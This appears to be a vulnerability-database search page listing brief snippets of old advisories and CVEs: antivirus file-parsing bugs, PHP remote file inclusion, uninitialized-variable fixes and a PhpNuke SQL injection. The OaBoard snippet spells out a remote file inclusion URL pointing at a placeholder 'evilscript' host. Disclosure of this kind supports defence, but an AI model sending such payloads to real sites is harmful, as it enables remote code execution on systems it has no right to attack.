1113 matches found
CVE-2006-5938
Grisoft AVG Anti-Virus before 7.1.407 has unknown impact and remote attack vectors involving an uninitialized variable and a crafted CAB file...
AVG Anti-Virus多个远程代码执行漏洞
AVG Anti-Virus是一款功能完备的杀毒软件。 AVG Anti-Virus的文件解析引擎存在多个漏洞,目前已确定的漏洞包括: - 解析.CAB文件时的整数溢出可能导致堆溢出; - 解析.CAB文件时未初始化变量; - 解析.DOC文件时会分隔为0; - 解析.RAR文件时的整数溢出可能导致堆溢出; - 解析.EXE文件时存在整数问题。 如果攻击者创建了特制文件的话,这些漏洞就可能导致远程执行任意代码。 Grisoft AVG Anti-Virus 7.1.407 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
No description provided by source. +------------------------------------------------------------------------------------------- + Segue CMS = 1.5.8 themesdir Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected...
CVE-2006-3615
Phorum 5.1.14 contains multiple PHP remote file inclusion vulnerabilities when register_globals is enabled. The issue allows remote attackers to execute arbitrary PHP code via vectors related to an uninitialized variable. The affected software is Phorum 5.1.14; impact is partial confidentiality, ...
OaBoard 1.0 Remote File inclusion
OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...
Remote file inclusion
PHP remote file inclusion vulnerability in common.php in Intensive Point iUser Ecommerce allows remote attackers to include arbitrary files via a URL in the includepath variable, which is not initialized before being used...
Tolva.txt
Script: Tolva PHP website system Version: 0.1.0 Language: PHP Official Website: http://sourceforge.net/projects/twebs Problem: Remote File Include Discovered by: beford Description: ============ A complete collection of php scripts that work tightly together to create a highly customizable, dynam...
Fedora Core 3 : mysql-3.23.58-16.FC3.1 (2005-304)
Sat Apr 2 2005 Tom Lane 3.23.58-16.FC3.1 - Repair uninitialized variable in security2 patch. - Enable testing on 64-bit arches; continue to exclude s390x which still has issues. - Sat Mar 19 2005 Tom Lane 3.23.58-15.FC3.1 - Backpatch repair for CVE-2005-0709, CVE-2005-0710, CVE-2005-0711...
DEBIAN-CVE-2005-2109
wp-login.php in WordPress 1.5.1.2 and earlier allows remote attackers to change the content of the forgotten password e-mail message via the message variable, which is not initialized before use...
File Upload Manager Sploits
Below is some code for a recent unpatched exploit for file managers using php as the base code. Share this with the world and help protect. File Upload Manager - Bypass File Extension and Arbitrary File Delete nothing to see here @ hackthissite.org Through an input validation flaw, users are able...
Fedora Core 2 : mysql-3.23.58-16.FC2.1 (2005-305)
Sat Apr 2 2005 Tom Lane 3.23.58-16.FC2.1 - Repair uninitialized variable in security2 patch. - Enable testing on 64-bit arches; continue to exclude s390x which still has issues. - Fri Mar 18 2005 Tom Lane 3.23.58-15.FC2.1 - Backpatch repair for CVE-2005-0709, CVE-2005-0710, CVE-2005-0711...
waraxe-2005-SA041.txt
================================================================================ waraxe-2005-SA041 ================================================================================ Critical Sql Injection in PhpNuke 6.x-7.6 Top module...
CVE-2022-3642
Removed by vendor...